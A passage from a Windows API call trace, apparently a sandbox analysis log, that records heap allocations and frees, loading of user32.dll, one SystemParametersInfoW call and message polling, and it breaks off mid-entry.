Size=0x4) returned 0x2a72388 [0258.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0258.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0258.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0258.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0258.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0258.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0258.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0258.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0258.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0258.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0258.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0258.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0258.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0258.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0258.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0258.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0258.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0258.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0258.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0258.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0258.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0258.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0258.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0258.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0258.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0258.924] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0258.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0258.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0258.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0258.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0258.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0258.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0258.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0258.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0258.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0258.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0258.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0258.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0258.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0258.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0258.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0258.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0258.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0258.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0258.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0258.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0258.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0258.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0258.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0258.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0258.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0258.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0258.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0258.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0258.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0258.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0258.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0258.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0258.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0258.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0258.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0258.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0258.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0258.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0258.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0258.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0258.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0258.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0258.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0258.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0258.926] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0258.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0258.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0258.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0258.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6ee0 [0258.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f6ee0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0258.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0258.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0258.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0258.927] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0258.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0258.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0258.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0258.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0258.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0258.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0258.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0258.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0258.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0258.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0258.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0258.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0258.927] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0259.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38665d0 [0259.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7180 [0259.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0259.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0259.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0259.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0259.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0259.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0259.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0259.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0259.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0259.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0259.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0259.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0259.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0259.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0259.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0259.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0259.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0259.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0259.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0259.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0259.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0259.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0259.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0259.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0259.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0259.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0259.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0259.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0259.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0259.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0259.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0259.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0259.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0259.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0259.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0259.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0259.039] FreeLibrary (hLibModule=0x76240000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0259.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0259.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0259.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0259.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0259.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865490 [0259.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0259.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0259.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38665d0 | out: hHeap=0x2af0000) returned 1 [0259.041] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0259.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0259.041] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0259.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0259.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0259.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0259.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0259.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0259.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0259.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0259.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0259.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0259.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0259.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0259.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0259.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0259.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0259.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865490 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 